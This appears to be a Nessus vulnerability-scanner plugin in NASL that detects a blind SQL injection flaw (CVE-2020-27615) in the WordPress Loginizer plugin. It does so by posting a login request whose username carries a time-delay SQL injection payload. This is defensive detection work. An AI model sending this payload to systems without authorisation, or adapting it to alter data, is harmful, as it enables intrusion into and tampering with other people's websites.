The Loginizer Plugin for WordPress running on the remote web server is affected by a SQL injection vulnerability due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this issue to inject or manipulate SQL queries in the back-end database, resulting in the manipulation of arbitrary data.
#
# (C) Tenable Network Security, Inc.
#
include('compat.inc');
# Registration phase: when the scanner loads this file with 'description' set,
# only the metadata below is recorded and exit(0) ends the run before any of
# the HTTP requests further down are sent.
if (description)
{
script_id(141810);
script_version("1.4");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/12/05");
# Identifiers this check reports against.
script_cve_id("CVE-2020-27615");
script_xref(name:"CEA-ID", value:"CEA-2020-0130");
script_name(english:"WordPress Loginizer plugin < 1.6.4 blind SQLi (CVE-2020-27615)");
script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a PHP script that is affected by a remote SQL injection vulnerability.");
script_set_attribute(attribute:"description", value:
"The Loginizer Plugin for WordPress running on the remote web server is affected by a SQL injection vulnerability
due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this issue to
inject or manipulate SQL queries in the back-end database, resulting in the manipulation of arbitrary data.");
script_set_attribute(attribute:"see_also", value:"https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/");
script_set_attribute(attribute:"see_also", value:"https://loginizer.com/blog/loginizer-1-6-4-security-fix/");
# Remediation shown to the operator: the fixed release named here is 1.6.4.
script_set_attribute(attribute:"solution", value:
"Upgrade the Loginizer Plugin for WordPress to version 1.6.4 or later.");
# Severity scoring (CVSS v2 and v3.0, base and temporal); cvss_score_source
# names the CVE the vectors are attributed to.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-27615");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
# "exploited_by_nessus" is true because the test section of this script
# confirms the flaw with a timed injection request instead of a version compare.
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2020/10/21");
script_set_attribute(attribute:"patch_publication_date", value:"2020/10/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/10/22");
script_set_attribute(attribute:"plugin_type", value:"remote");
# NOTE(review): this CPE names WordPress core, not the Loginizer plugin, so
# CPE-based asset correlation will attribute the finding to core - confirm
# whether a plugin-specific CPE is intended.
script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
script_end_attributes();
# ACT_ATTACK: the check is an active probe (it submits a crafted login request
# to the target), so it belongs in scans where such traffic is authorised.
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Scheduling prerequisites: depends on wordpress_detect.nasl and requires the
# KB keys installed_sw/WordPress and www/PHP plus a web service port.
script_dependencies("wordpress_detect.nasl");
script_require_keys("installed_sw/WordPress", "www/PHP");
script_require_ports("Services/www", 80);
exit(0);
}
include('http.inc');
include('url_func.inc');
include('webapp_func.inc');
# --- Target selection -------------------------------------------------------
# Stop immediately when no WordPress install was recorded for this host.
app = 'WordPress';
get_install_count(app_name:app, exit_if_zero:TRUE);

# Pick the PHP-capable web port and the WordPress install that lives on it.
port = get_http_port(default:80, php:TRUE);
install = get_single_install(app_name:app, port:port);
dir = install['path'];
install_url = build_url(port:port, qs:dir);

# --- Loginizer presence -----------------------------------------------------
plugin = 'Loginizer';
plugin_dir = '/wp-content/plugins/loginizer/';
plugin_url = build_url(port:port, qs:dir + plugin_dir);

# Prefer a result already stored in the KB for this port and install path.
kb_key = 'www/' + port + '/webapp_ext/' + plugin + ' under ' + dir;
installed = get_kb_item(kb_key);

if (!installed)
{
  # Nothing cached: look for the plugin's readme.txt and its title line.
  checks = make_array();
  checks[plugin_dir + 'readme.txt'][0] = make_list('=== Loginizer ===');

  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );
}

# Still not found: audit the plugin as not installed rather than probing
# a site that does not appear to host it.
if (!installed)
{
  audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + ' plugin');
}
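# Time-based confirmation of CVE-2020-27615.
#
# Flow:
#   1. Send one ordinary failed login for the user 'nessus' and time it. This
#      is the baseline. (Presumably it also makes sure a log row for that
#      username exists, since the probe's WHERE clause names it - confirm.)
#   2. For every entry in 'stimes', repeat the login with a username that
#      carries a SLEEP(n) expression and compare the response time with n.
#
# Sets for the reporting code that follows:
#   vuln   - TRUE only when every probe was delayed by the requested time
#   output - timing summary used as the plugin output
#
# Changes from the previous revision, all aimed at fewer false positives:
#   - the accumulators are initialised explicitly instead of starting as NULL;
#   - the baseline request is timed, and the run is declared inconclusive when
#     an ordinary login is already as slow as the injected delay;
#   - the loop stops at the first probe that is not delayed, so a single slow
#     final response can no longer decide the verdict on its own and no
#     further probes are sent to a target that did not react.
#
# Operational note: every request here is a failed login, so it may show up in
# the target's login / brute-force logs under the scanner's address.
stimes = make_list(15, 15);
num_queries = max_index(stimes);
vuln = FALSE;
output = '';
time_per_query = '';
overalltime = 0;

url = '/wp-login.php';
postdata = 'log=nessus&pwd=1229132295&wp-submit=Log+In&redirect_to=&testcookie=1';

# Baseline: how long does a plain failed login take on this target?
baseline_start = unixtime();
http_send_recv3(
  method       : 'POST',
  port         : port,
  item         : dir + url,
  data         : postdata,
  content_type : 'application/x-www-form-urlencoded',
  exit_on_fail : TRUE
);
baseline = unixtime() - baseline_start;

for (i = 0; i < num_queries; i++)
{
  # A target that needs this long for an ordinary login cannot be judged by a
  # delay of the same size; stop before sending the probe.
  if (baseline >= stimes[i])
    exit(1, 'The ' + app + ' install at ' + install_url + ' took ' + baseline +
            ' secs to answer an ordinary login request, so a ' + stimes[i] +
            '-second delay cannot be attributed to the test query.');

  # NOTE(review): the read timeout (sleep + 10) is shorter than the accepted
  # window below (sleep + 15); with exit_on_fail set, responses in the last
  # five seconds of the window presumably never reach the comparison - confirm
  # which bound is intended.
  http_set_read_timeout(stimes[i] + 10);

  then = unixtime();
  postdata = 'log=nessus%27%2C+lockout%3Dlockout%2Bsleep%28' + stimes[i] + '%29+WHERE+username%3D%27nessus%27+LIMIT+1%3B%23&pwd=1229132295&wp-submit=Log+In&testcookie=1';
  res = http_send_recv3(
    method       : 'POST',
    port         : port,
    item         : dir + url,
    data         : postdata,
    content_type : 'application/x-www-form-urlencoded',
    exit_on_fail : TRUE
  );
  now = unixtime();
  ttime = now - then;

  # Keep a per-probe log for the report.
  query = 'SLEEP(' +stimes[i]+ ');';
  time_per_query += 'Query #' + (i+1) + ' : ' + query + ' Sleep Time : ' +
    stimes[i] + ' secs Response Time : ' + ttime + ' secs\n';
  overalltime += ttime;

  # Not delayed (or delayed far beyond the request): treat the target as not
  # confirmed and stop probing.
  if ( (ttime < stimes[i]) || (ttime > (stimes[i] + 15)) )
  {
    vuln = FALSE;
    break;
  }

  # Delayed as requested; the verdict stands unless a later probe disagrees.
  vuln = TRUE;
  output =
    'Blind SQL Injection Results' +
    '\n Query : ' + query +
    '\n Response time : ' + ttime + ' secs' +
    '\n Number of queries executed : ' + num_queries +
    '\n Total test time : ' + overalltime + ' secs' +
    '\n Time per query : ' +
    '\n'+ ' ' + time_per_query;
}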
# No confirmed delay: audit the plugin as present but not affected.
# audit() ends the run, so the report below is reached only when 'vuln' is set.
if (!vuln)
{
  audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, plugin_url, plugin + ' plugin');
}

# Confirmed: raise the finding with the timing summary and the last request
# that was sent, so an analyst can see exactly what triggered the result.
security_report_v4(
  port     : port,
  severity : SECURITY_HOLE,
  generic  : TRUE,
  sqli     : TRUE,
  request  : make_list(http_last_sent_request()),
  output   : output
);